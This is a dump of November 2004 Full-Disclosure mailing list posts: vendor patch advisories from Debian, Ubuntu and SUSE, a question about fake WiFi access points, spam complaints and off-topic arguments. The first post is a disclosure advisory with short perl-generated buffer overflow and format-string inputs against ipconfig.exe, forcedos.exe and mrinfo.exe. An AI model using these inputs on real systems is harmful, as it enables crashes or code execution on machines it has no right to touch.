[Full-Disclosure] Microsoft Windows cmd line tools BOFs
Microsoft commandline tools BOF s Product:Windows-2000 SP4 / Windows-XP SP2 Vulnerablities: - Buffer Overflow (no privilege escalation) Vendor: Microsoft (http://www.microsoft.com/) Vendor-Status: vendor contacted (between 2002 and 2003) Vendor-Patches: ipconfig (XP-SP 2) / forcedos.exe and mrinfo.exe not available Objects:ipconfig.exe / forcedos.exe / mrinfo.exe Exploitable: Local: PARTIAL Remote: NO Introduction --- = Vulnerability Details = 1) LOCAL BUFFER OVERFLOWS / FORMAT STRING VULNERABILITY === OBJECTS: ipconfig.exe (only Windows-2000 SP4) forcedos.exe mrinfo.exe DESCRIPTION: Insufficient input-validation leads to a) stack based bufferoverflows and b) format string- vulnerabilites. EXAMPLES: a) ipconfig.exe /`perl -e 'print P\x44\x33\x22\x11,%08xx13,%n;'` b) forcedos.exe `perl -e 'print Ax6784;'` c) mrinfo.exe -i `perl -e 'print Ax60;'` === GENERAL REMARKS === Find related postings regarding this issue here: (http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2004-10/0065.html). It is unlikely you to gain access or elevate priviledges thru forcedos.exe and mrinfo.exe. Nevertheless it might be possible to misuse ipconfig.exe in an restricted environment with DHCP enabled !! Recommended Hotfixes --- EOF @2003 [EMAIL PROTECTED],[EMAIL PROTECTED] === Contact === SEC-CONSULT UK / EUROPE Austria / EUROPE [EMAIL PROTECTED] [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] controversial shadowcrew site hacked by secret service?
Danny wrote: The Secret Service, or any other government enforcement agency would not condone, promote, or participate in website defacement activities. I know some of you have little faith in these agencies, but, one thing is for sure, they would never stoop this low. Insecure replied: Even when the Secret Service admits that they took over the site and put up their own page, you don't believe it? Must be nice to have such blind faith in the integrity of your government enforcement agencies. Duh... I don't know whether it's you folks who doomed us to another 4 years of hell trying to justify your own blind faith or what, but it's time you all woke up to reality. Good Morning America! Our government is no more (as) ethical as any other country. Whether it is our agents murdering a South American dictator we don't happen to like, or our agents defacing a cracker's site, it happens. Obviously you slept through the weeks of cyberwar our (paid) hackers fought with China's (paid) hackers after they downed our jet a while back. It was China who finally called a truce in their official press. Sorry to give you people the bad news, but Bambi died a while ago. It's the wild west in 1800 and there is no law. If you want to survive, you better have a hired gun and we go for $300/hour these days. At least those of us who have met the black hat on main street at 50 paces at high noon and walked away to tell about it. Curt Purdy CISSP, GSEC, MCSE+I, CNE, CCDA Information Security Engineer DP Solutions - If you spend more on coffee than on IT security, you will be hacked. What's more, you deserve to be hacked. -- former White House cybersecurity zar Richard Clarke ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [SECURITY] [DSA 594-1] New Apache packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 594-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze November 17th, 2004 http://www.debian.org/security/faq - -- Package: apache Vulnerability : buffer overflows Problem-Type : remote Debian-specific: no CVE ID : CAN-2004-0940 Two vulnerabilities have been identified in the Apache 1.3 webserver: CAN-2004-0940 Crazy Einstein has discovered a vulnerability in the mod_include module, which can cause a buffer to be overflown and could lead to the execution of arbitrary code. NO VULN ID Larry Cashdollar has discovered a potential buffer overflow in the htpasswd utility, which could be exploited when user-supplied is passed to the program via a CGI (or PHP, or ePerl, ...) program. For the stable distribution (woody) these problems have been fixed in version 1.3.26-0woody6. For the unstable distribution (sid) these problems have been fixed in version 1.3.33-2. We recommend that you upgrade your apache packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6.dsc Size/MD5 checksum: 668 fa649037f25230b2ba98f8efd713ad88 http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6.diff.gz Size/MD5 checksum: 299617 1765e5037ede60c140b9e23b063229ea http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26.orig.tar.gz Size/MD5 checksum: 2586182 5cd778bbe6906b5ef39dbb7ef801de61 Architecture independent components: http://security.debian.org/pool/updates/main/a/apache/apache-doc_1.3.26-0woody6_all.deb Size/MD5 checksum: 1022694 f0446d04bf9c37df0b8a1f9be6f3aad6 Alpha architecture: http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_alpha.deb Size/MD5 checksum: 395536 15fdfaaa7dbbc72258e08796648f4b8e http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_alpha.deb Size/MD5 checksum: 926002 ebbf79cf5c21f90b195bbd43948013e4 http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_alpha.deb Size/MD5 checksum: 713916 fe8f05f9645bd3e8488390c6fd1b2b51 ARM architecture: http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_arm.deb Size/MD5 checksum: 361166 1c18634efb67b0cbb2de9a109dd02714 http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_arm.deb Size/MD5 checksum: 838810 9dc7aa64b92560e2af3310495726c5a4 http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_arm.deb Size/MD5 checksum: 544394 4f83a87a3efc91221f2de6e4b51495f1 Intel IA-32 architecture: http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_i386.deb Size/MD5 checksum: 353260 5d8bba199ad51b93d69b3d93dd357bcc http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_i386.deb Size/MD5 checksum: 813432 0bb2c86f93d31ca3c677afc539f41835 http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_i386.deb Size/MD5 checksum: 535772 fc62f039e6164064956de81416564da3 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_ia64.deb Size/MD5 checksum: 436892 d870f942fcf5f2176865ab0a0ff90ddc http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_ia64.deb Size/MD5 checksum: 1012454 f74ff7702abd1314867b5fd81874baad http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_ia64.deb Size/MD5 checksum: 949188 095050c609a54e53379c231629844a7c HP Precision architecture: http://security.debian.org/pool/updates/main/a/apache/apache_1.3.26-0woody6_hppa.deb Size/MD5 checksum: 386218 86b1b77c83a3b7346b11e5f00db8865e http://security.debian.org/pool/updates/main/a/apache/apache-common_1.3.26-0woody6_hppa.deb Size/MD5 checksum: 891646 65e8f5775d23b19084a7606ff808c336 http://security.debian.org/pool/updates/main/a/apache/apache-dev_1.3.26-0woody6_hppa.deb Size/MD5 checksum:
Re: [Full-Disclosure] question regarding CAN-2004-0930
Rob klein Gunnewiek wrote: Not completely so. Issuing the command using the client causes that the wildcards are sent to the server where globbing is handled.. there's also where the error occurs. When you mount it first and you do the 'ls' command, your local BASH (not 'ls') handles the globbing (wildcards) so it doesn't even arrive at the smb server. ah, now that makes sense, yes. thanks for the explanation. Christian. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] WiFi question
List, I'm an expert in nothing so when I saw this I had to ask, as Im sure theres someone out there that is a WiFi expert. Google has found no answer so here goes. Last night we saw a new access point appear. No problems its an ad-hoc network so its someone's machine with XP on configured for their home W-LAN probably. Running Netstumbler shows more on it though. You get 2 Access Points showing this ESSID for a few seconds. Then you get a 3rd, then a 4rth. Then the first two drop off, this repeats forever. Always using a different MAC address when a new AP appears. The APs are all WEP enabled (which I cant crack cos I dont have the savvy or the tools :) ) and this goes on forever. The MACs are all from different pools (i.e. assigned to different manufacturers) so the only conclusion is that they are all spoofed MACs. I have walked around the office and as far as I can tell its coming from this office (the IT dept), basing that assumption on signal strength. Anyone seen any tools that do this? I would love a little hand-held gadget that would help me find it (like the scanner in Alien!) Answers on a post card :) Colin. ** This e-mail is confidential and may contain privileged information. If you are not the addressee or if you have received the e-mail in error, it may be unlawful for you to read, copy, distribute, disclose or otherwise use the information which it contains. Under these circumstances, please notify us immediately by returning this mail to '[EMAIL PROTECTED]' and deleting this e-mail from your system. Any views expressed by an individual within this e-mail do not necessarily reflect the views of Cadbury Schweppes Plc or its subsidiaries. Cadbury Schweppes Plc will not be bound by any agreement entered into as a result of this email, unless its intention is clearly evidenced in the body of the email. Whilst we have taken reasonable steps to ensure that this e-mail and attachments are free from viruses, recipients are advised to subject this mail to their own virus checking, in keeping with good computing practice. Please note that email received by Cadbury Schweppes Plc or its subsidiaries may be monitored in accordance with the prevailing law in the United Kingdom. ** ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] controversial shadowcrew site hacked by secret service?
[EMAIL PROTECTED] wrote on 11/16/2004 01:22:25 PM: On Tue, 16 Nov 2004 16:58:46 +, n3td3v [EMAIL PROTECTED] wrote: The site which was hosting services, like bombs, fake ID and other terrorist stuff is now showing a defacement or replacement page showing words from the intelligence services. http://www.shadowcrew.com Is this fake or real? Who knows.. The Secret Service, or any other government enforcement agency would not condone, promote, or participate in website defacement activities. I know some of you have little faith in these agencies, but, one thing is for sure, they would never stoop this low. Wait, wait...are you really saying that website defacement is stooping too low for the feds? Surely you were saying that with tongue firmly in cheek, right? CONFIDENTIALITY NOTICE: This is a transmission from Kohl's Department Stores, Inc. and may contain information which is confidential and proprietary. If you are not the addressee, any disclosure, copying or distribution or use of the contents of this message is expressly prohibited. If you have received this transmission in error, please destroy it and notify us immediately at 262-703-7000. CAUTION: Internet and e-mail communications are Kohl's property and Kohl's reserves the right to retrieve and read any message created, sent and received. Kohl's reserves the right to monitor messages by authorized Kohl's Associates at any time without any further consent.
[Full-Disclosure] How the hell can we CAN SPAM??
It's just getting ridicules not to mention what it cost all of us in the end. And might I add doesn't make since. I mean, they spam selling something with no real contact but a spoofed one or real website to reach (most of the time). I placed an web appliance at my work place and catch an average of 52000 in 7 days. My ISP has spam filters yet I still receive a number a day. Now I am also the return to sender because of email spoofing. I get about 40-50 returned to sender, or can't deliver emails (not to mention what my ISP catches). There is not a dam thing I can do about it. Let add to this the problem for legit company's who have this done to them and they are placed on the blacklist. They are victims of this abuse that causes undo problems with their business affairs and it backlashes to their clients. I often have to help fight for some of our clients who have been victimized this way. They are not spammers but their addresses have been spoofed and blacklisted and now any client who uses spam blacklist block their legit address and miss their business correspondence. As for myself I am stuck with the pain of removing my email and setting up another one and the pain of contacting all correspondences who have that one to change it to the new one, etc., etc.. Or I could attempt to figure out the real senders, send abuse email out and hope someone would answer and help. Doubt that would work. Example: _- Date: Wed, 17 Nov 2004 12:12:27 + From: Mail Delivery System [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: Mail delivery failed: returning message to sender This message was created automatically by mail delivery software (Exim). A message that you sent could not be delivered to one or more of its recipients. This is a permanent error. The following address(es) failed: [EMAIL PROTECTED] unknown local-part byoder in domain bt.net -- This is a copy of the message, including all the headers. -- Return-path: lt;[EMAIL PROTECTED]gt; Received: from [217.35.209.184] (helo=insmtp22.bt.net) by insmtp01.ukcore.bt.net with esmtp (Exim 3.36 #1) id 1CUOfh-000628-00 for [EMAIL PROTECTED]; Wed, 17 Nov 2004 12:12:25 + Received: from [211.186.238.119] (helo=therightmoment.com) by insmtp22.bt.net with smtp (Exim 3.36 #1) id 1CUOTM-00043p-00 for [EMAIL PROTECTED]; Wed, 17 Nov 2004 11:59:40 + Received: from fidnet.com (fidnet.com.mail5.psmtp.com [64.18.5.10]) by therightmoment.com (Postfix) with ESMTP id 3097F4FF8C for lt;[EMAIL PROTECTED]gt;; Wed, 17 Nov 2004 06:09:31 -0600 Message-ID: lt;[EMAIL PROTECTED]gt; From: Tickled B. Pulsar lt;[EMAIL PROTECTED]gt; To: Byoder lt;[EMAIL PROTECTED]gt; Subject: =?iso-8859-1?B?VmFyaW91cyBQaWxscywgTG93IHJhdGVzLCBtb25leWJhY2sgZ3VhcmFu?= =?iso-8859-1?B?dGVlISA=?= Date: Wed, 17 Nov 2004 06:09:31 -0600 MIME-Version: 1.0 Content-Type: multipart/alternative; charset=iso-8859-1; boundary==_NextPart_000_0005_DDA5806C.B53BEAE9 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1081 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2479.0006 ___ The email message that was enclosed for these headers was a complete non sense one full of meaniless verbage like: __- TBODY TR TD bgColor=3d#99 height=3d22 DIV align=3dcenterSPAN class=3dstyle13Once something becomes di= scernible, or understandable, we no longer need to repeat it=2e We can de= stroy it=2e/SPAN/DIV/TD/TR/TBODY/TABLE TABLE cellSpacing=3d0 cellPadding=3d0 width=3d100% border=3d0 TBODY __ We talk about the scare of government control. Someone then tell me who else has the power to step in and stop the viral and spam. Who else has the money to back massive counter measures to put a stop to it all. I'm I just being too critical and a doom and gloom user. FYI: Yes I have ensured that I'm not zombified. I then tested again by turning off my internet use for two days and still received returns for those days. I clean machines for things like this for a living. Thanks for asking. thank you Randall M ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list.
In my opinion, I believe this list should be moderated for about a month or so. Just to weed the bullsh*t off. J -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jason Sent: Tuesday, November 16, 2004 10:20 PM To: Eric Scher Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list. tell him directly Gregh [EMAIL PROTECTED] Eric Scher wrote: [...] No point in sticking around to watch this ship finish sinking. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Airport x-ray software creating images of phantom weapons?
On Tue, 16 Nov 2004, Jason Coombs wrote: If the devices create phantoms by design, why would they not also obey commands to display arbitrary replacement images when some non-TEMPEST-hardened component is blasted with RF from within the x-ray scanning chamber? A few years ago I met someone who worked on the development of X-ray machines. One problem in the operation of the machines is that weapon in luggage are extremely rare and it's difficult to motivate a human operator into concentrating fully on the display for months on end without ever spotting anything. They literally are looking for needles in haystacks. The machines plant images of weapons into the display in order to keep the operator alert. I suppose the system is configured in such a way that a button press will remove imaginary weapons. Operators failing to spot the imaginary weapons will fail to press the button, revealing problems in training. Normally it would be difficult to discover these problems before it's too late as you'll never learn about real weapons that have passed through without being spotted. I imagine that the systems are well shielded from any interferance that the X-rays machine causes. Do such transportation security technologies really benefit from technical obscurity? Why not publish the design, specs and source code for analysis and for all to see? I suspect the problem was either a glitch in the software or, perhaps more likely operator error? James -- You're turning into a penguin. Stop it http://jamesd.ukgeeks.co.uk/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment
I sent this to n3td3v yesterday. Why look into the news..just go to the DOJ website...st8r to the fish's mouth. Indictment for hundreds of credit cards, UK passports, state licenses, school IDs, bank accounts...etc.. -Original Message- From: Todd Towles Sent: Tuesday, November 16, 2004 1:59 PM To: 'n3td3v' Subject: RE: [Full-Disclosure] Shadowcrew Grand Jury Indictment http://www.usdoj.gov/usao/nj/publicaffairs/NJ_Press/files/pdff iles/firewallindct1028.pdf -Original Message- From: n3td3v [mailto:[EMAIL PROTECTED] Sent: Tuesday, November 02, 2004 8:27 PM To: Todd Towles Subject: Re: [Full-Disclosure] Should the industry be expecting a hacker response to election results? On Tue, 2 Nov 2004 20:07:28 -0600, Todd Towles [EMAIL PROTECTED] wrote: Your messeage would assume all hackers are for Kerry...that may not be true True, I was really just trying to stir up opinion on the list and it kinda backfired on me. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list.
Then sign up for the ones that are moderated by other folks.. there are at least 3 copies of this list in moderated form. -KF Esler, Joel - Contractor wrote: In my opinion, I believe this list should be moderated for about a month or so. Just to weed the bullsh*t off. J -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jason Sent: Tuesday, November 16, 2004 10:20 PM To: Eric Scher Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list. tell him directly Gregh [EMAIL PROTECTED] Eric Scher wrote: [...] No point in sticking around to watch this ship finish sinking. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] controversial shadowcrew site hacked by secret service?
On Wed, 17 Nov 2004 04:23:52 -0600, Curt Purdy [EMAIL PROTECTED] wrote: Danny wrote: The Secret Service, or any other government enforcement agency would not condone, promote, or participate in website defacement activities. I know some of you have little faith in these agencies, but, one thing is for sure, they would never stoop this low. Insecure replied: Even when the Secret Service admits that they took over the site and put up their own page, you don't believe it? Must be nice to have such blind faith in the integrity of your government enforcement agencies. Duh... I don't know whether it's you folks who doomed us to another 4 years of hell trying to justify your own blind faith or what, but it's time you all woke up to reality. Good Morning America! Our government is no more (as) ethical as any other country. Whether it is our agents murdering a South American dictator we don't happen to like, or our agents defacing a cracker's site, it happens. Obviously you slept through the weeks of cyberwar our (paid) hackers fought with China's (paid) hackers after they downed our jet a while back. It was China who finally called a truce in their official press. Sorry to give you people the bad news, but Bambi died a while ago. It's the wild west in 1800 and there is no law. If you want to survive, you better have a hired gun and we go for $300/hour these days. At least those of us who have met the black hat on main street at 50 paces at high noon and walked away to tell about it. 1) I am not a US citizen, nor do I live in a US state, and quite frankly, I would be scared to live in a country under the control of George W. Bush. 2) Yes, it was difficult to tell that I was kidding, but notice the end of my email ...D is also a big smile. 3) I can count to three. Yippeee ...D ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [USN-26-1] bogofilter vulnerability
=== Ubuntu Security Notice USN-26-1 November 17, 2004 bogofilter vulnerability CAN-2004-1007 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) The following packages are affected: bogofilter The problem can be corrected by upgrading the affected package to version 0.92.0-1ubuntu0.1. In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Antti-Juhani Kaijanaho discovered a Denial of Service vulnerability in bogofilter. The quoted-printable decoder handled certain Base-64 encoded strings in an invalid way which caused a buffer overflow and an immediate program abort. The exact impact depends on the way bogofilter is integrated into the system. In common setups, the mail that contains such malformed headers is deferred by the mail delivery agent and remains in the queue, where it will eventually bounce back to the sender. Source archives: http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter_0.92.0-1ubuntu0.1.diff.gz Size/MD5: 8825 09252ecd72a0d71a1f4332f5ade2f76d http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter_0.92.0-1ubuntu0.1.dsc Size/MD5: 597 8b1cf3ccbb7ba6bd97d8caa5a8c48ed4 http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter_0.92.0.orig.tar.gz Size/MD5: 815622 e90aebf14893f2d850d2a173ea4b815d amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter_0.92.0-1ubuntu0.1_amd64.deb Size/MD5: 313446 0df2d93a5e9548407bcbda1066f1fe1a i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter_0.92.0-1ubuntu0.1_i386.deb Size/MD5: 278344 335e6ec086e837127ce74b3b2b82c2a5 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/b/bogofilter/bogofilter_0.92.0-1ubuntu0.1_powerpc.deb Size/MD5: 303866 f78bf60dd489e4499e90f7eff208e0c6 signature.asc Description: Digital signature
[Full-Disclosure] SUSE Security Announcement: xshared, XFree86-libs, xorg-x11-libs (SUSE-SA:2004:041)
-BEGIN PGP SIGNED MESSAGE- __ SUSE Security Announcement Package:xshared, XFree86-libs, xorg-x11-libs Announcement-ID:SUSE-SA:2004:041 Date: Wednesday, Nov 17th 2004 15:00 MET Affected products: 8.1, 8.2, 9.0, 9.1, 9.2 SUSE Linux Desktop 1.0 SUSE Linux Enterprise Server 8, 9 Novell Linux Desktop 1.0 Vulnerability Type: remote system compromise Severity (1-10):8 SUSE default package: yes Cross References:none Content of this advisory: 1) security vulnerability resolved: - several integer overflows - out-of-bounds memory access - shell command execution - path traversal - endless loops - memory leaks problem description 2) solution/workaround 3) special instructions and notes 4) package location and checksums 5) pending vulnerabilities, solutions, workarounds: - ImageMagick - clamav - perl-MIME-Tools, perl-Archive-ZIP - apache / mod_include - apache2 / mod_SSL 6) standard appendix (further information) __ 1) problem description, brief discussion The XPM library which is part of the XFree86/XOrg project is used by several GUI applications to process XPM image files. A source code review done by Thomas Biege of the SuSE Security-Team revealed several different kinds of bugs. The bug types are: - integer overflows - out-of-bounds memory access - shell command execution - path traversal - endless loops By providing a special image these bugs can be exploited by remote and/or local attackers to gain access to the system or to escalate their local privileges. 2) solution/workaround No workaround exists to protect against these bugs. 3) special instructions and notes Please restart the X server or switch to runlevel 3 and back to 5 to make sure every GUI application is restarted and uses the new library. 4) package location and checksums Download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command rpm -Fhv file.rpm to apply the update. Our maintenance customers are being notified individually. The packages are being offered for installation from the maintenance web. Smalltalk is the only package using libxpm statically. It will be available via YOU too. x86 Platform: SUSE Linux 9.2: ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/xorg-x11-libs-6.8.1-15.3.i586.rpm 395edf444f05b448aa7c7e70455333ce patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/xorg-x11-libs-6.8.1-15.3.i586.patch.rpm 8d215ce255838120c70ba77ad944a84f source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/src/xorg-x11-6.8.1-15.3.src.rpm 3889aee5895035c57c716f370f5e414a SUSE Linux 9.1: ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/XFree86-libs-4.3.99.902-43.35.3.i586.rpm 89431783cd8261a970d6ec5484dd09e6 patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/XFree86-libs-4.3.99.902-43.35.3.i586.patch.rpm 8ea579d10465143a2334be812f23561e source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/XFree86-4.3.99.902-43.35.3.src.rpm a37eaa7e7b99c5c3e61439f2a4b00b2d SUSE Linux 9.0: ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/XFree86-libs-4.3.0.1-57.i586.rpm a12b2e861f114868fd70997f72536c8b patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/i586/XFree86-libs-4.3.0.1-57.i586.patch.rpm c6ea49a796b316aa68dacc51ffd8eb8d source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/9.0/rpm/src/XFree86-4.3.0.1-57.src.rpm f53026511a470b875b0f9a63c52128d3 SUSE Linux 8.2: ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/XFree86-libs-4.3.0-132.i586.rpm b918f14df14961cf89528a930f49d7c4 patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/i586/XFree86-libs-4.3.0-132.i586.patch.rpm 9c9c268bb248f1bcf2ef899ced2d5aa4 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.2/rpm/src/XFree86-4.3.0-132.src.rpm 9a7846ddf22d58f9f64704b3a2451640 SUSE Linux 8.1: ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/xshared-4.2.0-269.i586.rpm d4549acb039d8bf317bc6052598764c9 patch rpm(s):
Re: [Full-Disclosure] WiFi question
fake ap http://bsdvault.net/bsdfap.txt http://www.blackalchemy.to/project/fakeap/ -KF [EMAIL PROTECTED] wrote: List, I'm an expert in nothing so when I saw this I had to ask, as Im sure theres someone out there that is a WiFi expert. Google has found no answer so here goes. Last night we saw a new access point appear. No problems its an ad-hoc network so its someone's machine with XP on configured for their home W-LAN probably. Running Netstumbler shows more on it though. You get 2 Access Points showing this ESSID for a few seconds. Then you get a 3rd, then a 4rth. Then the first two drop off, this repeats forever. Always using a different MAC address when a new AP appears. The APs are all WEP enabled (which I cant crack cos I dont have the savvy or the tools :) ) and this goes on forever. The MACs are all from different pools (i.e. assigned to different manufacturers) so the only conclusion is that they are all spoofed MACs. I have walked around the office and as far as I can tell its coming from this office (the IT dept), basing that assumption on signal strength. Anyone seen any tools that do this? I would love a little hand-held gadget that would help me find it (like the scanner in Alien!) Answers on a post card :) Colin. ** This e-mail is confidential and may contain privileged information. If you are not the addressee or if you have received the e-mail in error, it may be unlawful for you to read, copy, distribute, disclose or otherwise use the information which it contains. Under these circumstances, please notify us immediately by returning this mail to '[EMAIL PROTECTED]' and deleting this e-mail from your system. Any views expressed by an individual within this e-mail do not necessarily reflect the views of Cadbury Schweppes Plc or its subsidiaries. Cadbury Schweppes Plc will not be bound by any agreement entered into as a result of this email, unless its intention is clearly evidenced in the body of the email. Whilst we have taken reasonable steps to ensure that this e-mail and attachments are free from viruses, recipients are advised to subject this mail to their own virus checking, in keeping with good computing practice. Please note that email received by Cadbury Schweppes Plc or its subsidiaries may be monitored in accordance with the prevailing law in the United Kingdom. ** ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list.
A volunteer? ;-) -Original Message- From: Esler, Joel - Contractor [EMAIL PROTECTED] Date: Wed, 17 Nov 2004 09:05:46 To:Jason [EMAIL PROTECTED], Eric Scher [EMAIL PROTECTED] Cc:[EMAIL PROTECTED], [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list. In my opinion, I believe this list should be moderated for about a month or so. Just to weed the bullsh*t off. J -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jason Sent: Tuesday, November 16, 2004 10:20 PM To: Eric Scher Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list. tell him directly Gregh [EMAIL PROTECTED] Eric Scher wrote: [...] No point in sticking around to watch this ship finish sinking. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html --- Sent via XDAII BlackBerry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Mailfilters or how I learned to stop worrying and love the n00bs.
Hey, I just heard of a really cool new technology called mail-filters! It works like this: 1) You set up a rule to filter out everything you don't want to read (for instance where the topic contains election fraud). 2) Go make some coffee, smoke a cigarette, code an exploit, whatever you want to do with all the free time you now have! Turns out it's not new AT ALL! Every decent mailclient has been supporting it for years!! Is that cool or what !? You can even set a filter for specific people (for instance where the from line contains Berend-Jan Wever), so you won't have to read anything I ever send to any list again! Cheers, SkyLined - Original Message - From: Esler, Joel - Contractor [EMAIL PROTECTED] To: Jason [EMAIL PROTECTED]; Eric Scher [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Wednesday, November 17, 2004 15:05 Subject: RE: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list. In my opinion, I believe this list should be moderated for about a month or so. Just to weed the bullsh*t off. J -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jason Sent: Tuesday, November 16, 2004 10:20 PM To: Eric Scher Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] You have sent the attached unsolicited e-mail to an otherwise GOOD security email list. tell him directly Gregh [EMAIL PROTECTED] Eric Scher wrote: [...] No point in sticking around to watch this ship finish sinking. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Mailfilters or how I learned to stop worrying and love the n00bs.
